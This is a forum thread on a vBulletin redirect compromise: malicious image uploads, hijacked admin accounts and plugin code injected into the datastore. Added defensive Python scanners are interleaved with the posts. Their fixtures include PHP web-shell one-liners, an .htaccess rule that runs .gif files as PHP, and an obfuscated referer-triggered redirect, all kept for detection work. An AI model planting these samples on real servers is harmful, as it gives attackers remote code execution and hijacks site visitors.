vBulletin 3.x and 4.x Redirect Security Exploit

This topic is closed.
  • djbaxter
    replied
    Originally posted by Zachery
    Nothing, however it is not my job to provide complete forensic analysis of your third-party add-ons to determine where the code is coming from. If this was a completely, 100% stock vBulletin board, we would try to look into the issue. But every board I've checked has had vBSEO, also other plugins, but off the top of my head I haven't seen any similar ones specifically and is on vB3. That is the most common thing I've run into.
    Thanks. I would agree that it does seem that vB3 forums are more vulnerable to the redirect exploit, although it's unclear why. I guess this does confirm the sense in trying to ensure that ALL your software is up to date, whether it's vBulletin itself or add-ons.


  • Cbrown
    replied
    Ok, I may be way off, but this is what I'm guessing...

    Due to some server issues, the hacker was able to upload a malicious .gif file and run it as a PHP file. I have since corrected that issue, but too little too late...

    That person has then since grabbed enough info from the database and uploaded the redirect script.

    Since then they must have decoded the admin passwords, and used those to regain entrance back into the admin section.

    ...

    I'm sure about the PHP-laden .gif file. I'm not sure about the getting DB info and getting the passwords. But SOMEHOW, a person snagged two of my users' admin passwords. Two people with nothing in common and living in different states. Or there is a major hole somewhere in the code.

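The failure mode Cbrown guesses at above (an image upload that is really a PHP script, executed by the web server because of a misconfiguration in the upload directory) can be checked for directly. The following is an added example, not code from this thread or from vBulletin: it walks an upload tree, compares each file's magic bytes with its extension, looks for a PHP open tag inside image files, and flags any `.htaccess` dropped into the tree, since a handler override there is one common way a `.gif` ends up handed to the PHP interpreter. The sample files are constructed in a temporary directory; the file names and payloads are illustrative.

```python
"""Scan an upload/attachment directory for image files that carry PHP code.

Added example, not code from the thread or from vBulletin. Sample files are
constructed below in a temporary directory.
"""
import os
import re
import tempfile

# Magic bytes for the image types a forum normally accepts as avatars/attachments.
MAGIC = {
    ".gif": (b"GIF87a", b"GIF89a"),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}

# Anything that makes the PHP engine start interpreting the file.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)|<script[^>]+language\s*=\s*['\"]?php", re.I)


def classify(path):
    """Return a list of findings for one file (empty list means nothing flagged)."""
    findings = []
    ext = os.path.splitext(path)[1].lower()
    with open(path, "rb") as fh:
        data = fh.read()
    expected = MAGIC.get(ext)
    if expected is not None and not data.startswith(expected):
        findings.append("extension %s does not match file header" % ext)
    if PHP_TAG.search(data):
        findings.append("contains a PHP open tag")
    if os.path.basename(path) == ".htaccess":
        findings.append("handler override file inside upload tree")
    return findings


def scan_tree(root):
    """Walk root and return {relative_path: [findings]} for every flagged file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = classify(full)
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


def build_sample_tree():
    """Create a constructed upload directory: one real GIF, one GIF with a PHP
    payload appended, one PHP file renamed to .jpg, and a rogue .htaccess.
    Returns the root path."""
    root = tempfile.mkdtemp(prefix="uploads_")
    samples = {
        "avatar1.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00;",
        # valid GIF header followed by PHP: the header fools a type check, and the
        # code still runs if the server hands .gif files to the PHP interpreter
        "avatar2.gif": b"GIF89a\x01\x00\x01\x00;<?php eval(base64_decode($_POST['c'])); ?>",
        "photo.jpg": b"<?php system($_GET['cmd']); ?>",
        ".htaccess": b"AddHandler application/x-httpd-php .gif\n",
    }
    for name, content in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, hits in sorted(scan_tree(build_sample_tree()).items()):
        print(rel, "->", "; ".join(hits))
```

Finding a file like `avatar2.gif` tells you the upload filter was bypassed, but the file only becomes a shell if the server executes it; the durable fix is on the server side (for Apache, disabling the PHP engine for the upload directory in the vhost configuration and setting `AllowOverride None` there so an uploaded `.htaccess` cannot re-enable it). The thread does not say which misconfiguration applied in Cbrown's case, only that it was a server-side issue.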

  • Zachery
    replied
    Originally posted by djbaxter
    Thank you, Zachery.

    However, two points:

    1. CBrown above at http://www.vbulletin.com/forum/showt...=1#post2168506 identifies a different non-vBSEO plugin from vBulletin.org as the source on his installation.

    2. While this may fix the problem by clearing/rebuilding the datastore, since the precise entry point and method is unclear, what's to stop the problem from reappearing?
    Nothing, however it is not my job to provide complete forensic analysis of your third-party add-ons to determine where the code is coming from. If this was a completely, 100% stock vBulletin board, we would try to look into the issue. But every board I've checked has had vBSEO, also other plugins, but off the top of my head I haven't seen any similar ones specifically and is on vB3. That is the most common thing I've run into.


  • djbaxter
    replied
    Originally posted by Zachery
    For anyone having their search engine traffic redirected, I've only found plugin code in a vBSEO plugin point in the datastore table. Enabling and disabling a single plugin normally rebuilds the pluginlist in the datastore and fixes the problem.
    Thank you, Zachery.

    However, two points:

    1. CBrown above at http://www.vbulletin.com/forum/showt...=1#post2168506 identifies a different non-vBSEO plugin from vBulletin.org as the source on his installation.

    2. While this may fix the problem by clearing/rebuilding the datastore, since the precise entry point and method is unclear, what's to stop the problem from reappearing?


  • Zachery
    replied
    For anyone having their search engine traffic redirected, I've only found plugin code in a vBSEO plugin point in the datastore table. Enabling and disabling a single plugin normally rebuilds the pluginlist in the datastore and fixes the problem.

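Zachery's post above says the redirect code was found in the pluginlist entry of the datastore table, and that toggling a plugin rebuilds that entry. Before rebuilding, it is worth reading the entry, because it shows which hook was abused and what the injected code did. The script below is an added example, not vBulletin code and not from this thread. It assumes that the datastore row titled `pluginlist` in vBulletin 3.x/4.x is a PHP-serialized array mapping hook name to the PHP source of the enabled plugins at that hook (fetched with something like `SELECT data FROM datastore WHERE title = 'pluginlist'`, adjusting for your table prefix), parses it with a minimal PHP unserializer, and flags hooks whose code uses `eval`, an obfuscation decoder, a `Location:` header, or a search-engine referer/user-agent check, which is the pattern behind "only search engine traffic is redirected". The blob and hook names are constructed for the example.

```python
"""Scan a vBulletin 'pluginlist' datastore blob for injected redirect code.

Added example, not vBulletin code and not from the thread. Assumption: the
datastore row titled 'pluginlist' is a PHP-serialized array of
hook name -> PHP source of all enabled plugins at that hook.
The sample blob below is constructed; hook names are illustrative.
"""
import re

SUSPICIOUS = [
    (re.compile(r"\beval\s*\(", re.I), "eval()"),
    (re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     "obfuscation decoder"),
    (re.compile(r"header\s*\(\s*['\"]Location:", re.I), "Location: redirect"),
    (re.compile(r"(?:HTTP_(?:REFERER|USER_AGENT).{0,80}(?:google|bing|yahoo)"
                r"|(?:google|bing|yahoo).{0,80}HTTP_(?:REFERER|USER_AGENT))", re.I | re.S),
     "search-engine traffic check"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I), "preg_replace /e"),
]


def php_unserialize(blob):
    """Minimal PHP unserialize() for s/i/b/N/a values (enough for pluginlist).
    Works on bytes because PHP string lengths are byte counts."""
    def parse(pos):
        t = blob[pos:pos + 1]
        if t == b"N":
            return None, pos + 2
        if t in (b"i", b"b"):
            end = blob.index(b";", pos)
            val = int(blob[pos + 2:end])
            return (bool(val) if t == b"b" else val), end + 1
        if t == b"s":
            colon = blob.index(b":", pos + 2)
            length = int(blob[pos + 2:colon])
            start = colon + 2                    # skip ':"'
            val = blob[start:start + length]
            assert blob[start + length:start + length + 2] == b'";'
            return val.decode("utf-8", "replace"), start + length + 2
        if t == b"a":
            colon = blob.index(b":", pos + 2)
            count = int(blob[pos + 2:colon])
            pos = colon + 2                      # skip ':{'
            out = {}
            for _ in range(count):
                key, pos = parse(pos)
                val, pos = parse(pos)
                out[key] = val
            return out, pos + 1                  # skip '}'
        raise ValueError("unsupported type %r at offset %d" % (t, pos))
    value, _ = parse(0)
    return value


def scan_pluginlist(blob):
    """Return {hook: [reasons]} for hooks whose code matches a suspicious marker."""
    report = {}
    for hook, code in php_unserialize(blob).items():
        reasons = [label for rx, label in SUSPICIOUS if rx.search(code or "")]
        if reasons:
            report[hook] = reasons
    return report


def php_serialize(value):
    """Serialize str/int/dict the way PHP does; used only to build the sample blob."""
    if isinstance(value, str):
        raw = value.encode("utf-8")
        return b's:%d:"%s";' % (len(raw), raw)
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError(type(value))


# Constructed sample: one benign hook and one hook carrying an injected redirect
# that fires only when the visitor arrived from a search engine. The base64
# payload decodes to: header("Location: http://example.com");
SAMPLE_PLUGINLIST = php_serialize({
    "global_start": "if ($vbulletin->options['swearcensor']) { $censor = true; }",
    "global_complete": (
        "if (preg_match('/google|bing|yahoo/i', $_SERVER['HTTP_REFERER'])) "
        "{ eval(base64_decode('aGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL2V4YW1wbGUuY29tIik7')); }"
    ),
})

if __name__ == "__main__":
    for hook, reasons in scan_pluginlist(SAMPLE_PLUGINLIST).items():
        print(hook, "->", ", ".join(reasons))
```

Rebuilding the datastore removes the injected entry, which is the fix Zachery describes; djbaxter's follow-up question still stands, since the rebuild does nothing about whatever wrote the entry (a compromised admin account, a plugin row edited through the control panel, or direct database access), so the scan is a way to find the evidence before it is overwritten, not a replacement for closing the entry point.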

  • Paul M
    replied
    Perhaps they are deleting the log records after they have finished.


  • Cbrown
    replied
    Originally posted by Paul M
    They are attempting to view [or edit] a user account.

    As your logs don't log the query string [or cookies], it's hard to tell much more.
    That's what I figured, but can you comment on the post I made above:


    How is it that I can find in my access logs on the server someone doing something in the control panel and editing, but nothing shows up in the vbulletin control panel log? The only thing vbulletin recorded is that the user logged in, but nothing about the control panel (that shows up in the server logs) was logged. I'm stumped by that...


  • Paul M
    replied
    They are attempting to view [or edit] a user account.

    As your logs don't log the query string [or cookies], it's hard to tell much more.


  • Cbrown
    replied
    Haven't found much going through older logs... But I keep on seeing this:


    89.212.30.147 - - [06/Jun/2011:22:27:16 -0500] "GET /forums/mcbadmin/user.php?do=update HTTP/1.0" 200 6248 "http://www.mcarterbrown.com/forums/mcbadmin/user.php?do=update" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"

    That IP comes up as a Spam IP... Same thing done with a bunch of other IP addresses on different days. But someone is trying to do something in my admin section. Maybe running a script?

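Cbrown's two posts above make the same point from two angles: the web server's access_log shows requests into the renamed admin directory (`/forums/mcbadmin/...`, including `user.php?do=update`), while the vBulletin control panel log shows only a login, and Paul M suggests the log rows were deleted afterwards. Because the access_log is written by the web server and not by vBulletin, an attacker with admin access cannot edit it through the control panel, so reconciling the two is a way to recover what the control panel log no longer shows. The script below is an added example, not code from the thread or from vBulletin. The log lines are constructed in the Apache combined format used in Cbrown's post (the admin directory name and the `OffByOne` user agent are taken from that post; IPs and timestamps are made up), and the control panel log rows are constructed to resemble vBulletin's cplog table (script, action, dateline, ipaddress), which is an assumption about that table's layout; the admin script names used are also assumptions.

```python
"""Correlate web-server hits on the vBulletin admin directory with the control
panel log, to find admin actions the control panel log no longer shows.

Added example, not from the thread or vBulletin. All log lines and cplog rows
below are constructed. Assumption: cplog rows export as
(script, action, dateline, ipaddress), dateline being a Unix timestamp.
"""
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlsplit

ADMIN_DIR = "/forums/mcbadmin/"           # renamed admincp directory, per the thread
ADMIN_ALLOWLIST = {"203.0.113.10"}         # assumed: the IP the real admin works from
MATCH_WINDOW = timedelta(seconds=5)        # cplog dateline vs. access_log time tolerance

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Parse one Apache combined-format line; returns None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = urlsplit(rec["url"])
    rec["script"] = parts.path.rsplit("/", 1)[-1]
    rec["do"] = parse_qs(parts.query).get("do", [""])[0]
    return rec


def admin_hits(lines):
    """Parsed requests that touch the admin directory."""
    return [r for r in (parse_line(ln) for ln in lines)
            if r and r["url"].startswith(ADMIN_DIR)]


def unlogged_admin_actions(lines, cplog_rows):
    """Admin requests with a do= action that have no cplog row for the same
    script and action within MATCH_WINDOW. Requests to index.php (login, home)
    are skipped since those are not what the control panel log is for."""
    findings = []
    for hit in admin_hits(lines):
        if not hit["do"] or hit["script"] == "index.php":
            continue
        matched = any(
            row["script"] == hit["script"] and row["action"] == hit["do"]
            and abs(datetime.fromtimestamp(row["dateline"], timezone.utc) - hit["time"]) <= MATCH_WINDOW
            for row in cplog_rows
        )
        if not matched:
            findings.append((hit["ip"], hit["time"].isoformat(), hit["script"], hit["do"]))
    return findings


def foreign_admin_ips(lines):
    """Source IPs hitting the admin directory that are not on the allowlist."""
    return sorted({h["ip"] for h in admin_hits(lines)} - ADMIN_ALLOWLIST)


def log_ts(text):
    """Apache timestamp text -> Unix time, to build cplog rows that line up."""
    return int(datetime.strptime(text, "%d/%b/%Y:%H:%M:%S %z").timestamp())


UA = "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
SAMPLE_LOG = [  # constructed access_log lines
    '203.0.113.10 - - [06/Jun/2011:21:00:00 -0500] "GET /forums/mcbadmin/index.php?do=home HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [06/Jun/2011:22:27:10 -0500] "POST /forums/mcbadmin/index.php?do=login HTTP/1.0" 302 0 "-" "%s"' % UA,
    '198.51.100.7 - - [06/Jun/2011:22:27:16 -0500] "GET /forums/mcbadmin/user.php?do=update HTTP/1.0" 200 6248 "http://example.com/forums/mcbadmin/user.php?do=update" "%s"' % UA,
    '198.51.100.7 - - [06/Jun/2011:22:28:40 -0500] "POST /forums/mcbadmin/plugin.php?do=update HTTP/1.0" 200 4401 "-" "%s"' % UA,
    '203.0.113.10 - - [06/Jun/2011:23:05:02 -0500] "GET /forums/mcbadmin/cplog.php?do=list HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.0.2.55 - - [06/Jun/2011:23:10:00 -0500] "GET /forums/showthread.php?t=1 HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
]
SAMPLE_CPLOG = [  # constructed cplog rows; note there is no row for plugin.php
    {"script": "index.php", "action": "login", "dateline": log_ts("06/Jun/2011:22:27:10 -0500"), "ipaddress": "198.51.100.7"},
    {"script": "user.php", "action": "update", "dateline": log_ts("06/Jun/2011:22:27:16 -0500"), "ipaddress": "198.51.100.7"},
    {"script": "cplog.php", "action": "list", "dateline": log_ts("06/Jun/2011:23:05:02 -0500"), "ipaddress": "203.0.113.10"},
]

if __name__ == "__main__":
    print("admin hits from non-allowlisted IPs:", foreign_admin_ips(SAMPLE_LOG))
    for ip, when, script, action in unlogged_admin_actions(SAMPLE_LOG, SAMPLE_CPLOG):
        print("admin action with no cplog row:", ip, when, script, action)
```

Run against a real export, the first list answers "who else has been in the admin directory", and the second answers "which of their actions are missing from the control panel log", which is the gap Cbrown noticed. The thread also notes that the access_log in question did not record query strings or cookies; the parser above keeps working in that case (the `do=` field is then empty and those hits are only reported by `foreign_admin_ips`), but the per-action matching needs the query string, so logging it is worth turning on before the next incident.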

  • Cbrown
    replied
    Ok, even I was hacked again. Now I didn't follow my last rule.

    Change administrator passwords...

    I did NOT do this. And because of this, some interesting stuff happened.

    Here's the hack from this morning:
    I left ALL the information and links in there because the greater good comes above some of my privacy at this point:

    Forum and Site dedicated to old and rare paintball guns, the players, and those that just love the game


    I grep'd my access_log and pulled out this info. That IP: 209.236.66.108 is from a Tor router, so the hacker is trying to stay anonymous.

    Backstory: I had 3 admins... Myself, Cat, and Incynr8

    My buddy incynr8 hasn't been around in a long long time, but he still had admin privileges from a while back. I noticed his account had activity a while back. Knew it wasn't him. Notified him to change his passwords. I removed his admin access.

    In this log above (test.txt) you'll see the hacker logging into the server (mcbadmin is the admin folder for vbulletin, I renamed it, and will again after all this in a few days or so), the hacker logs in, and checks out the user "incynr8". Looks at his profile, etc. He sees that I'm catching on.

    This time, after looking at the admin account "Cat", that person had a "last activity" in their profile showing for this morning... I know for a fact this person did not use or log in either.

    So somehow the hacker got ANOTHER password from an admin.

    ...

    Here's where it gets funny. I go and look at the "control panel" log for more evidence. I can't find any.

    But my access_log on the server says someone was in the control panel. I check the control panel again... Where it says "Show Only Entries Generated By", there is a choice for "all users" and then a drop-down box for specific users.

    Well, both of the admins "Cat" and "Incynr8" are not a choice. I don't know why... I'm in the drop down list, and I'm an admin, but I can no longer see the other two as a choice.

    I have since changed my password now, and I am the only admin left on the site.

    ...

    Also looking at the log, you can see the plugin the hacker used to edit the site to redirect. For me, plugin 671 is the "Disable Swear Censor Per Forum"

    I'm going to go further back through my previous logs and see if I can't find out how these user passwords were compromised. Neither of the accounts hacked have been used in months.

    I will most likely change my database password just in case. I would assume if the person had the database password, they would just do it that way, not logging in as an admin. Somehow the passwords are being cracked...

    That's my update for now. Will post more as I go through older logs.


  • Paul M
    replied
    Originally posted by Ramsesx
    Interesting, is this a new security exploit? Could someone from staff confirm this?
    It's neither new nor a vBulletin issue - it's a server exploit.


  • Ramsesx
    replied
    Thanks for this quick answer.


  • djbaxter
    replied
    Originally posted by IBxAnders
    Definitely not NEW and this is an old issue that was related to an older vBSEO exploit. What I am seeing is that malicious PHP files are hard to find and people are not able to clean it out 100%, leaving their sites susceptible to more attacks.
    It was not a vBSEO issue either. It was/is a server permissions issue.


  • djbaxter
    replied
    Originally posted by Ramsesx
    Interesting, is this a new security exploit? Could someone from staff confirm this?
    See above. This is NOT a vBulletin exploit. It's a file permissions issue. And it's not particularly new, but it may be part of some of the redirection issues people are experiencing.


  • IBxAnders
    replied
    Originally posted by Ramsesx
    Interesting, is this a new security exploit? Could someone from staff confirm this?
    Definitely not NEW and this is an old issue that was related to an older vBSEO exploit. What I am seeing is that malicious PHP files are hard to find and people are not able to clean it out 100%, leaving their sites susceptible to more attacks.
